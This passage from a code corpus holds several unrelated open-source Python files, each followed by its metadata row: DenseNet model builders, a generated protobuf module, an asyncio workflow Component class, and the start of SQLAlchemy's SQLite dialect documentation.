# has keys 'norm.1', 'relu.1', 'conv.1', 'norm.2', 'relu.2', 'conv.2'.
# They are also in the checkpoints in model_urls. This pattern is used
# to find such keys.
pattern = re.compile(
r'^(.*denselayer\d+\.(?:norm|relu|conv))\.((?:[12])\.(?:weight|bias|running_mean|running_var))$')
state_dict = model_zoo.load_url(model_urls['densenet121'])
for key in list(state_dict.keys()):
res = pattern.match(key)
if res:
new_key = res.group(1) + res.group(2)
state_dict[new_key] = state_dict[key]
del state_dict[key]
model.load_state_dict(state_dict)
return model
def densenet169(pretrained=False, **kwargs):
r"""Densenet-169 model from
`"Densely Connected Convolutional Networks" <https://arxiv.org/pdf/1608.06993.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = DenseNet(num_init_features=64, growth_rate=32, block_config=(6, 12, 32, 32),
**kwargs)
if pretrained:
        # '.'s are no longer allowed in module names, but previous _DenseLayer
# has keys 'norm.1', 'relu.1', 'conv.1', 'norm.2', 'relu.2', 'conv.2'.
# They are also in the checkpoints in model_urls. This pattern is used
# to find such keys.
pattern = re.compile(
r'^(.*denselayer\d+\.(?:norm|relu|conv))\.((?:[12])\.(?:weight|bias|running_mean|running_var))$')
state_dict = model_zoo.load_url(model_urls['densenet169'])
for key in list(state_dict.keys()):
res = pattern.match(key)
if res:
new_key = res.group(1) + res.group(2)
state_dict[new_key] = state_dict[key]
del state_dict[key]
model.load_state_dict(state_dict)
return model
def densenet201(pretrained=False, **kwargs):
r"""Densenet-201 model from
`"Densely Connected Convolutional Networks" <https://arxiv.org/pdf/1608.06993.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = DenseNet(num_init_features=64, growth_rate=32, block_config=(6, 12, 48, 32),
**kwargs)
if pretrained:
        # '.'s are no longer allowed in module names, but previous _DenseLayer
# has keys 'norm.1', 'relu.1', 'conv.1', 'norm.2', 'relu.2', 'conv.2'.
# They are also in the checkpoints in model_urls. This pattern is used
# to find such keys.
pattern = re.compile(
r'^(.*denselayer\d+\.(?:norm|relu|conv))\.((?:[12])\.(?:weight|bias|running_mean|running_var))$')
state_dict = model_zoo.load_url(model_urls['densenet201'])
for key in list(state_dict.keys()):
res = pattern.match(key)
if res:
new_key = res.group(1) + res.group(2)
state_dict[new_key] = state_dict[key]
del state_dict[key]
model.load_state_dict(state_dict)
return model
def densenet161(pretrained=False, **kwargs):
r"""Densenet-161 model from
`"Densely Connected Convolutional Networks" <https://arxiv.org/pdf/1608.06993.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = DenseNet(num_init_features=96, growth_rate=48, block_config=(6, 12, 36, 24),
**kwargs)
if pretrained:
        # '.'s are no longer allowed in module names, but previous _DenseLayer
# has keys 'norm.1', 'relu.1', 'conv.1', 'norm.2', 'relu.2', 'conv.2'.
# They are also in the checkpoints in model_urls. This pattern is used
# to find such keys.
pattern = re.compile(
r'^(.*denselayer\d+\.(?:norm|relu|conv))\.((?:[12])\.(?:weight|bias|running_mean|running_var))$')
state_dict = model_zoo.load_url(model_urls['densenet161'])
for key in list(state_dict.keys()):
res = pattern.match(key)
if res:
new_key = res.group(1) + res.group(2)
state_dict[new_key] = state_dict[key]
del state_dict[key]
model.load_state_dict(state_dict)
return model
class _DenseLayer(nn.Sequential):
def __init__(self, num_input_features, growth_rate, bn_size, drop_rate):
super(_DenseLayer, self).__init__()
self.add_module('norm1', nn.BatchNorm2d(num_input_features)),
self.add_module('relu1', nn.ReLU(inplace=True)),
self.add_module('conv1', nn.Conv2d(num_input_features, bn_size *
growth_rate, kernel_size=1, stride=1, bias=False)),
self.add_module('norm2', nn.BatchNorm2d(bn_size * growth_rate)),
self.add_module('relu2', nn.ReLU(inplace=True)),
self.add_module('conv2', nn.Conv2d(bn_size * growth_rate, growth_rate,
kernel_size=3, stride=1, padding=1, bias=False)),
self.drop_rate = drop_rate
def forward(self, x):
new_features = super(_DenseLayer, self).forward(x)
if self.drop_rate > 0:
new_features = F.dropout(new_features, p=self.drop_rate, training=self.training)
return torch.cat([x, new_features], 1)
class _DenseBlock(nn.Sequential):
def __init__(self, num_layers, num_input_features, bn_size, growth_rate, drop_rate):
super(_DenseBlock, self).__init__()
for i in range(num_layers):
layer = _DenseLayer(num_input_features + i * growth_rate, growth_rate, bn_size, drop_rate)
self.add_module('denselayer%d' % (i + 1), layer)
class _Transition(nn.Sequential):
def __init__(self, num_input_features, num_output_features):
super(_Transition, self).__init__()
self.add_module('norm', nn.BatchNorm2d(num_input_features))
self.add_module('relu', nn.ReLU(inplace=True))
self.add_module('conv', nn.Conv2d(num_input_features, num_output_features,
kernel_size=1, stride=1, bias=False))
self.add_module('pool', nn.AvgPool2d(kernel_size=2, stride=2))
class DenseNet(nn.Module):
r"""Densenet-BC model class, based on
`"Densely Connected Convolutional Networks" <https://arxiv.org/pdf/1608.06993.pdf>`_
Args:
growth_rate (int) - how many filters to add each layer (`k` in paper)
block_config (list of 4 ints) - how many layers in each pooling block
num_init_features (int) - the number of filters to learn in the first convolution layer
bn_size (int) - multiplicative factor for number of bottle neck layers
(i.e. bn_size * k features in the bottleneck layer)
drop_rate (float) - dropout rate after each dense layer
num_classes (int) - number of classification classes
"""
def __init__(self, growth_rate=32, block_config=(6, 12, 24, 16),
num_init_features=64, bn_size=4, drop_rate=0, num_classes=1000):
super(DenseNet, self).__init__()
# First convolution
self.features = nn.Sequential(OrderedDict([
('conv0', nn.Conv2d(3, num_init_features, kernel_size=7, stride=2, padding=3, bias=False)),
('norm0', nn.BatchNorm2d(num_init_features)),
('relu0', nn.ReLU(inplace=True)),
('pool0', nn.MaxPool2d(kernel_size=3, stride=2, padding=1)),
]))
# Each denseblock
num_features = num_init_features
for i, num_layers in enumerate(block_config):
block = _DenseBlock(num_layers=num_layers, num_input_features=num_features,
bn_size=bn_size, growth_rate=growth_rate, drop_rate=drop_rate)
self.features.add_module('denseblock%d' % (i + 1), block)
num_features = num_features + num_layers * growth_rate
if i != len(block_config) - 1:
trans = _Transition(num_input_features=num_features, num_output_features=num_features // 2)
self.features.add_module('transition%d' % (i + 1), trans)
num_features = num_features // 2
# Final batch norm
self.features.add_module('norm5', nn.BatchNorm2d(num_features))
# Linear layer
self.classifier = nn.Linear(num_features, num_classes)
# Official init from torch repo.
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.constant_(m.bias, 0)
def forward(self, x):
features = self.features(x)
out = F.relu(features, inplace=True)
out = F.avg_pool2d(out, kernel_size=7, stride=1).view(features.size(0), -1)
out = self.classifier(out)
return out
| 44.216814 | 109 | 0.625638 | [
"BSD-3-Clause"
] | AaronLeong/cvlib | cvlib/models/densenet.py | 9,993 | Python |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: storyboard_node.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from container_sdk.model.next_builder import storyboard_brick_pb2 as container__sdk_dot_model_dot_next__builder_dot_storyboard__brick__pb2
from container_sdk.model.next_builder import storyboard_route_pb2 as container__sdk_dot_model_dot_next__builder_dot_storyboard__route__pb2
from container_sdk.model.next_builder import micro_app_project_pb2 as container__sdk_dot_model_dot_next__builder_dot_micro__app__project__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='storyboard_node.proto',
package='next_builder',
syntax='proto3',
serialized_options=_b('ZFgo.easyops.local/contracts/protorepo-models/easyops/model/next_builder'),
serialized_pb=_b('\n\x15storyboard_node.proto\x12\x0cnext_builder\x1a\x37\x63ontainer_sdk/model/next_builder/storyboard_brick.proto\x1a\x37\x63ontainer_sdk/model/next_builder/storyboard_route.proto\x1a\x38\x63ontainer_sdk/model/next_builder/micro_app_project.proto\"\xe8\x02\n\x0eStoryboardNode\x12\x12\n\ninstanceId\x18\x01 \x01(\t\x12\r\n\x05\x61lias\x18\x02 \x01(\t\x12\r\n\x05\x61ppId\x18\x03 \x01(\t\x12\n\n\x02id\x18\x04 \x01(\t\x12\x12\n\nmountPoint\x18\x05 \x01(\t\x12\x0c\n\x04sort\x18\x06 \x01(\x05\x12\x0c\n\x04type\x18\x07 \x01(\t\x12,\n\x05\x62rick\x18\x08 \x01(\x0b\x32\x1d.next_builder.StoryboardBrick\x12,\n\x05route\x18\t \x01(\x0b\x32\x1d.next_builder.StoryboardRoute\x12.\n\x07project\x18\n \x01(\x0b\x32\x1d.next_builder.MicroAppProject\x12,\n\x06parent\x18\x0b \x01(\x0b\x32\x1c.next_builder.StoryboardNode\x12.\n\x08\x63hildren\x18\x0c \x03(\x0b\x32\x1c.next_builder.StoryboardNodeBHZFgo.easyops.local/contracts/protorepo-models/easyops/model/next_builderb\x06proto3')
,
dependencies=[container__sdk_dot_model_dot_next__builder_dot_storyboard__brick__pb2.DESCRIPTOR,container__sdk_dot_model_dot_next__builder_dot_storyboard__route__pb2.DESCRIPTOR,container__sdk_dot_model_dot_next__builder_dot_micro__app__project__pb2.DESCRIPTOR,])
_STORYBOARDNODE = _descriptor.Descriptor(
name='StoryboardNode',
full_name='next_builder.StoryboardNode',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='instanceId', full_name='next_builder.StoryboardNode.instanceId', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='alias', full_name='next_builder.StoryboardNode.alias', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='appId', full_name='next_builder.StoryboardNode.appId', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='id', full_name='next_builder.StoryboardNode.id', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mountPoint', full_name='next_builder.StoryboardNode.mountPoint', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='sort', full_name='next_builder.StoryboardNode.sort', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='type', full_name='next_builder.StoryboardNode.type', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='brick', full_name='next_builder.StoryboardNode.brick', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='route', full_name='next_builder.StoryboardNode.route', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='project', full_name='next_builder.StoryboardNode.project', index=9,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='parent', full_name='next_builder.StoryboardNode.parent', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='children', full_name='next_builder.StoryboardNode.children', index=11,
number=12, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=212,
serialized_end=572,
)
_STORYBOARDNODE.fields_by_name['brick'].message_type = container__sdk_dot_model_dot_next__builder_dot_storyboard__brick__pb2._STORYBOARDBRICK
_STORYBOARDNODE.fields_by_name['route'].message_type = container__sdk_dot_model_dot_next__builder_dot_storyboard__route__pb2._STORYBOARDROUTE
_STORYBOARDNODE.fields_by_name['project'].message_type = container__sdk_dot_model_dot_next__builder_dot_micro__app__project__pb2._MICROAPPPROJECT
_STORYBOARDNODE.fields_by_name['parent'].message_type = _STORYBOARDNODE
_STORYBOARDNODE.fields_by_name['children'].message_type = _STORYBOARDNODE
DESCRIPTOR.message_types_by_name['StoryboardNode'] = _STORYBOARDNODE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
StoryboardNode = _reflection.GeneratedProtocolMessageType('StoryboardNode', (_message.Message,), {
'DESCRIPTOR' : _STORYBOARDNODE,
'__module__' : 'storyboard_node_pb2'
# @@protoc_insertion_point(class_scope:next_builder.StoryboardNode)
})
_sym_db.RegisterMessage(StoryboardNode)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| 52.987342 | 992 | 0.774845 | [
"Apache-2.0"
] | easyopsapis/easyops-api-python | container_sdk/model/next_builder/storyboard_node_pb2.py | 8,372 | Python |
#!/usr/bin/env python3
import asyncio
import logging
from collections import defaultdict
from functools import partial
from box import Box
_l = logging.getLogger(__name__)
_instances = dict()
_events = defaultdict(asyncio.Event)
_event_queues = list()
_event_callbacks = defaultdict(list)
class Component:
"""A stateful element in a workflow that can be configured, run, and uniquely named."""
def __init__(self, *args, id=None, workflow=None, parent=None, logger=_l, **kwargs):
self.id = id
if id:
key = (type(self), id)
if key in _instances:
raise ValueError(
f'{key[0].__name__} with ID "{id}" already exists: {_instances[key]}')
_instances[key] = self
self.workflow = workflow
self.parent = parent
self.children = list()
if parent:
parent.children.append(self)
self.logger = logger
self.loop = asyncio.get_event_loop()
self._event_lock = set()
self._debug = {'events'}
self._settings = Box(self.configure(**kwargs) or dict())
if not workflow:
workflow = self
settings = [f'{k}={v}' for k, v in workflow.safe_settings(self._settings).items()]
self.debug(f'Initialized {" ".join(settings)}')
def configure(self, **settings):
return settings
def settings(self, **override):
return Box(self._settings, **override)
def safe_settings(self, settings):
return settings
@property
def type(self):
return type(self).__name__
@property
def status(self):
return getattr(self, '_status', None)
@status.setter
def status(self, status):
if not (self.hasstatus(status) or status in self._event_lock):
self._event_lock.add(status)
try:
self._status_setter(status)
finally:
self._event_lock.remove(status)
_dependent_statuses = {'processing-finished', 'finished', 'exited'}
def _status_setter(self, status):
event = status if isinstance(status, ComponentEvent) else ComponentEvent(status, self)
if event.status in self._dependent_statuses:
children = set(filter(lambda c: isinstance(c, Component), self.children))
ready = set(filter(lambda c: c.hasstatus(event.status), children))
if len(children) > len(ready):
if 'events' in self._debug:
pending = ", ".join(c.id for c in children.difference(ready))
self.debug(f'Status "{event.status}" waiting on {pending}')
return
if self.hasstatus('aborted') and event.status != 'exited':
if 'events' in self._debug:
self.debug(f'Ignoring status "{event.status}" because the component is '
'in aborted state')
return
# event.id = self._fqevent(status)
if 'events' in self._debug:
self.debug(f'Emitting event "{event.id}"')
self._status = event.status
_events[event.id].set()
for queue in _event_queues:
queue.put_nowait(event)
if self.parent and event.status != 'aborted' and not isinstance(self, LocalEvents):
self.parent.status = event.status
for callback in _event_callbacks[event.id]:
asyncio.ensure_future(callback())
_event_callbacks[event.id].clear()
def hasstatus(self, status):
"""Return `True` if given status was set."""
if isinstance(status, ComponentEvent):
event = status.id
elif ':' in status:
event = status
else:
event = ComponentEvent(status, self).id
return _events[event].is_set()
async def waiton(self, event):
if 'events' in self._debug:
self.debug(f'Waiting on event "{event}"')
await _events[event].wait()
if 'events' in self._debug:
self.debug(f'Received event "{event}"')
@property
def running(self):
"""Return `True` if in one of the running states."""
if not self.stopped:
for status in ['started', 'running']:
if self.hasstatus(status):
return True
@property
def stopped(self):
"""Return `True` if in one of the stopped states."""
for status in ['aborted', 'finished']:
if self.hasstatus(status):
return True
@property
def aborted(self):
"""Return `True` if the aborted event was emitted."""
return self.hasstatus('aborted')
def start(self):
self.status = 'started'
return self.run()
def stop(self):
self.debug('Stopping')
def abort(self, exception=None):
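        # Mark this component as aborted, then propagate the abort to children
        # and to the parent, skipping any child whose 'error-propagation'
        # setting is 'none' or 'up' and any parent whose setting is 'none'
        # or 'down'.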
if self.hasstatus('aborted'):
return
self.status = ComponentEvent('aborted', self, exception)
for child in self.children:
if child.settings().get('error-propagation') in ('none', 'up'):
if 'events' in self._debug:
self.debug(f'Suppressing error propagation to child {child.id}')
elif not child.hasstatus('aborted'):
if 'events' in self._debug:
self.debug(f'Propagating error to child {child.id}')
child.abort()
if self.parent:
if self.parent.settings().get('error-propagation') in ('none', 'down'):
if 'events' in self._debug:
self.debug(f'Suppressing error propagation to parent {self.parent.id}')
elif not self.parent.hasstatus('aborted'):
if 'events' in self._debug:
self.debug(f'Propagating error to parent {self.parent.id}')
self.parent.abort(exception)
def __getattr__(self, name):
if name not in ('critical', 'error', 'warning', 'info', 'debug', 'exception'):
raise AttributeError(f"'{self.type}' object has no attribute '{name}'")
return partial(self._proxied_logging_method, name)
def _proxied_logging_method(self, method, *args, **kwargs):
if method == 'debug':
            if 'logging' in (self.workflow or self).settings():
debug = (self.workflow or self).settings().logging.debug
else:
debug = []
if not ('all' in debug or self.type in debug or (self.id in debug)):
return lambda *a, **kw: None
return getattr(self.logger, method)(*self._log_formatted(*args), **kwargs)
def _log_formatted(self, msg, *args):
"""Return the msg prefixed with this component's ID and type."""
prefix = f'{self.id} ' if self.id else ''
msg = f'{prefix}({self.type}) {msg}'
return (msg,) + args
async def run(self):
self.status = 'running'
async def try_while_running(self, callable, timeout=0.5):
"""Return result of `callable`, or raise `ComponentInterrupted` if component is stopped."""
while self.running:
coro = callable()
try:
return await asyncio.wait_for(coro, timeout)
except asyncio.TimeoutError:
pass
raise ComponentInterrupted
class ComponentEvent:
def __init__(self, status, component, exception=None):
self.status = status
self.component = component
self.exception = exception
@property
def id(self):
"""Return a fully qualified ID string representing this event."""
return f'{self.component.id}:{self.status}'
class LocalEvents:
pass
class ComponentInterrupted(Exception):
pass
def get_event_listener():
"""Return a new `Queue` object that will see all events."""
queue = asyncio.Queue()
_event_queues.append(queue)
return queue
def add_event_callback(event, callable, *args, **kwargs):
"""Register a callback that will be called upon the given event."""
_event_callbacks[event].append(partial(callable, *args, **kwargs))
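# ---------------------------------------------------------------------------
# Usage sketch (illustrative only; `Printer` and `main` are hypothetical names,
# not part of this module's API): a component that overrides run() and emits
# the standard status events.
if __name__ == '__main__':
    class Printer(Component):
        async def run(self):
            await super().run()            # emits the "running" status event
            self.info('hello from Printer')
            self.status = 'finished'       # emits "printer-1:finished"
    async def main():
        printer = Printer(id='printer-1')
        await printer.start()              # emits "started", then awaits run()
        assert printer.hasstatus('finished')
    logging.basicConfig(level=logging.INFO)
    asyncio.run(main())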
| 33.524793 | 99 | 0.590903 | [
"MIT"
] | DrDub/pipekit | pipekit/component.py | 8,113 | Python |
# sqlite/base.py
# Copyright (C) 2005-2022 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: https://www.opensource.org/licenses/mit-license.php
r"""
.. dialect:: sqlite
:name: SQLite
:full_support: 3.21, 3.28+
:normal_support: 3.12+
:best_effort: 3.7.16+
.. _sqlite_datetime:
Date and Time Types
-------------------
SQLite does not have built-in DATE, TIME, or DATETIME types, and pysqlite does
not provide out of the box functionality for translating values between Python
`datetime` objects and a SQLite-supported format. SQLAlchemy's own
:class:`~sqlalchemy.types.DateTime` and related types provide date formatting
and parsing functionality when SQLite is used. The implementation classes are
:class:`_sqlite.DATETIME`, :class:`_sqlite.DATE` and :class:`_sqlite.TIME`.
These types represent dates and times as ISO formatted strings, which also
nicely support ordering. There's no reliance on typical "libc" internals for
these functions so historical dates are fully supported.
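For example, a minimal sketch of declaring a column with the SQLite-specific
:class:`_sqlite.DATETIME` type (the table and column names below are
illustrative)::
    from sqlalchemy import Column, Integer, MetaData, Table
    from sqlalchemy.dialects.sqlite import DATETIME
    metadata = MetaData()
    events = Table(
        "events", metadata,
        Column("id", Integer, primary_key=True),
        Column("created_at", DATETIME()),
    )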
Ensuring Text affinity
^^^^^^^^^^^^^^^^^^^^^^
The DDL rendered for these types is the standard ``DATE``, ``TIME``
and ``DATETIME`` indicators. However, custom storage formats can also be
applied to these types. When the
storage format is detected as containing no alpha characters, the DDL for
these types is rendered as ``DATE_CHAR``, ``TIME_CHAR``, and ``DATETIME_CHAR``,
so that the column continues to have textual affinity.
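For example, a storage format that renders to digits only would otherwise
imply numeric affinity, so the DDL falls back to the ``_CHAR`` name (a sketch;
a matching ``regexp`` would normally be supplied as well)::
    from sqlalchemy.dialects.sqlite import DATETIME
    # all-numeric storage format; rendered in DDL as DATETIME_CHAR
    dt = DATETIME(
        storage_format="%(year)04d%(month)02d%(day)02d"
                       "%(hour)02d%(minute)02d%(second)02d",
    )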
.. seealso::
`Type Affinity <https://www.sqlite.org/datatype3.html#affinity>`_ -
in the SQLite documentation
.. _sqlite_autoincrement:
SQLite Auto Incrementing Behavior
----------------------------------
Background on SQLite's autoincrement is at: https://sqlite.org/autoinc.html
Key concepts:
* SQLite has an implicit "auto increment" feature that takes place for any
non-composite primary-key column that is specifically created using
"INTEGER PRIMARY KEY" for the type + primary key.
* SQLite also has an explicit "AUTOINCREMENT" keyword, that is **not**
equivalent to the implicit autoincrement feature; this keyword is not
recommended for general use. SQLAlchemy does not render this keyword
unless a special SQLite-specific directive is used (see below). However,
it still requires that the column's type is named "INTEGER".
Using the AUTOINCREMENT Keyword
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
To specifically render the AUTOINCREMENT keyword on the primary key column
when rendering DDL, add the flag ``sqlite_autoincrement=True`` to the Table
construct::
Table('sometable', metadata,
Column('id', Integer, primary_key=True),
sqlite_autoincrement=True)
Allowing autoincrement behavior with SQLAlchemy types other than Integer/INTEGER
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SQLite's typing model is based on naming conventions. Among other things, this
means that any type name which contains the substring ``"INT"`` will be
determined to be of "integer affinity". A type named ``"BIGINT"``,
``"SPECIAL_INT"`` or even ``"XYZINTQPR"``, will be considered by SQLite to be
of "integer" affinity. However, **the SQLite autoincrement feature, whether
implicitly or explicitly enabled, requires that the name of the column's type
is exactly the string "INTEGER"**. Therefore, if an application uses a type
like :class:`.BigInteger` for a primary key, on SQLite this type will need to
be rendered as the name ``"INTEGER"`` when emitting the initial ``CREATE
TABLE`` statement in order for the autoincrement behavior to be available.
One approach to achieve this is to use :class:`.Integer` on SQLite
only using :meth:`.TypeEngine.with_variant`::
table = Table(
"my_table", metadata,
Column("id", BigInteger().with_variant(Integer, "sqlite"), primary_key=True)
)
Another is to use a subclass of :class:`.BigInteger` that overrides its DDL
name to be ``INTEGER`` when compiled against SQLite::
from sqlalchemy import BigInteger
from sqlalchemy.ext.compiler import compiles
class SLBigInteger(BigInteger):
pass
@compiles(SLBigInteger, 'sqlite')
def bi_c(element, compiler, **kw):
return "INTEGER"
@compiles(SLBigInteger)
def bi_c(element, compiler, **kw):
return compiler.visit_BIGINT(element, **kw)
table = Table(
"my_table", metadata,
Column("id", SLBigInteger(), primary_key=True)
)
.. seealso::
:meth:`.TypeEngine.with_variant`
:ref:`sqlalchemy.ext.compiler_toplevel`
`Datatypes In SQLite Version 3 <https://sqlite.org/datatype3.html>`_
.. _sqlite_concurrency:
Database Locking Behavior / Concurrency
---------------------------------------
SQLite is not designed for a high level of write concurrency. The database
itself, being a file, is locked completely during write operations within
transactions, meaning exactly one "connection" (in reality a file handle)
has exclusive access to the database during this period - all other
"connections" will be blocked during this time.
The Python DBAPI specification also calls for a connection model that is
always in a transaction; there is no ``connection.begin()`` method,
only ``connection.commit()`` and ``connection.rollback()``, upon which a
new transaction is to be begun immediately. This may seem to imply
that the SQLite driver would in theory allow only a single filehandle on a
particular database file at any time; however, there are several
factors both within SQLite itself as well as within the pysqlite driver
which loosen this restriction significantly.
However, no matter what locking modes are used, SQLite will still always
lock the database file once a transaction is started and DML (e.g. INSERT,
UPDATE, DELETE) has at least been emitted, and this will block
other transactions at least at the point that they also attempt to emit DML.
By default, the length of time on this block is very short before it times out
with an error.
This behavior becomes more critical when used in conjunction with the
SQLAlchemy ORM. SQLAlchemy's :class:`.Session` object by default runs
within a transaction, and with its autoflush model, may emit DML preceding
any SELECT statement. This may lead to a SQLite database that locks
more quickly than is expected. The locking mode of SQLite and the pysqlite
driver can be manipulated to some degree, however it should be noted that
achieving a high degree of write-concurrency with SQLite is a losing battle.
For more information on SQLite's lack of write concurrency by design, please
see
`Situations Where Another RDBMS May Work Better - High Concurrency
<https://www.sqlite.org/whentouse.html>`_ near the bottom of the page.
The following subsections introduce areas that are impacted by SQLite's
file-based architecture and additionally will usually require workarounds to
work when using the pysqlite driver.
.. _sqlite_isolation_level:
Transaction Isolation Level / Autocommit
----------------------------------------
SQLite supports "transaction isolation" in a non-standard way, along two
axes. One is that of the
`PRAGMA read_uncommitted <https://www.sqlite.org/pragma.html#pragma_read_uncommitted>`_
instruction. This setting can essentially switch SQLite between its
default mode of ``SERIALIZABLE`` isolation, and a "dirty read" isolation
mode normally referred to as ``READ UNCOMMITTED``.
SQLAlchemy ties into this PRAGMA statement using the
:paramref:`_sa.create_engine.isolation_level` parameter of
:func:`_sa.create_engine`.
Valid values for this parameter when used with SQLite are ``"SERIALIZABLE"``
and ``"READ UNCOMMITTED"`` corresponding to a value of 0 and 1, respectively.
SQLite defaults to ``SERIALIZABLE``, however its behavior is impacted by
the pysqlite driver's default behavior.
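For example, a sketch of selecting the "dirty read" mode at engine
configuration time (the database URL below is illustrative)::
    from sqlalchemy import create_engine
    eng = create_engine(
        "sqlite:///some.db",
        isolation_level="READ UNCOMMITTED",
    )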
When using the pysqlite driver, the ``"AUTOCOMMIT"`` isolation level is also
available, which will alter the pysqlite connection using the ``.isolation_level``
attribute on the DBAPI connection and set it to None for the duration
of the setting.
.. versionadded:: 1.3.16 added support for SQLite AUTOCOMMIT isolation level
when using the pysqlite / sqlite3 SQLite driver.
The other axis along which SQLite's transactional locking is impacted is
via the nature of the ``BEGIN`` statement used. The three varieties
are "deferred", "immediate", and "exclusive", as described at
`BEGIN TRANSACTION <https://sqlite.org/lang_transaction.html>`_. A straight
``BEGIN`` statement uses the "deferred" mode, where the database file is
not locked until the first read or write operation, and read access remains
open to other transactions until the first write operation. But again,
it is critical to note that the pysqlite driver interferes with this behavior
by *not even emitting BEGIN* until the first write operation.
.. warning::
SQLite's transactional scope is impacted by unresolved
issues in the pysqlite driver, which defers BEGIN statements to a greater
degree than is often feasible. See the section :ref:`pysqlite_serializable`
for techniques to work around this behavior.
.. seealso::
:ref:`dbapi_autocommit`
SAVEPOINT Support
----------------------------
SQLite supports SAVEPOINTs, which only function once a transaction is
begun. SQLAlchemy's SAVEPOINT support is available using the
:meth:`_engine.Connection.begin_nested` method at the Core level, and
:meth:`.Session.begin_nested` at the ORM level. However, SAVEPOINTs
won't work at all with pysqlite unless workarounds are taken.
.. warning::
SQLite's SAVEPOINT feature is impacted by unresolved
issues in the pysqlite driver, which defers BEGIN statements to a greater
degree than is often feasible. See the section :ref:`pysqlite_serializable`
for techniques to work around this behavior.
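A minimal sketch of SAVEPOINT use at the Core level, assuming the pysqlite
workarounds referenced above are in place (``engine`` and ``some_table`` below
are illustrative)::
    with engine.connect() as conn:
        with conn.begin():
            nested = conn.begin_nested()   # emits SAVEPOINT
            conn.execute(some_table.insert(), {"data": 1})
            nested.rollback()              # rolls back to the SAVEPOINT only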
Transactional DDL
----------------------------
The SQLite database supports transactional :term:`DDL` as well.
In this case, the pysqlite driver is not only failing to start transactions,
it also is ending any existing transaction when DDL is detected, so again,
workarounds are required.
.. warning::
SQLite's transactional DDL is impacted by unresolved issues
in the pysqlite driver, which fails to emit BEGIN and additionally
forces a COMMIT to cancel any transaction when DDL is encountered.
See the section :ref:`pysqlite_serializable`
for techniques to work around this behavior.
.. _sqlite_foreign_keys:
Foreign Key Support
-------------------
SQLite supports FOREIGN KEY syntax when emitting CREATE statements for tables,
however by default these constraints have no effect on the operation of the
table.
Constraint checking on SQLite has three prerequisites:
* At least version 3.6.19 of SQLite must be in use
* The SQLite library must be compiled *without* the SQLITE_OMIT_FOREIGN_KEY
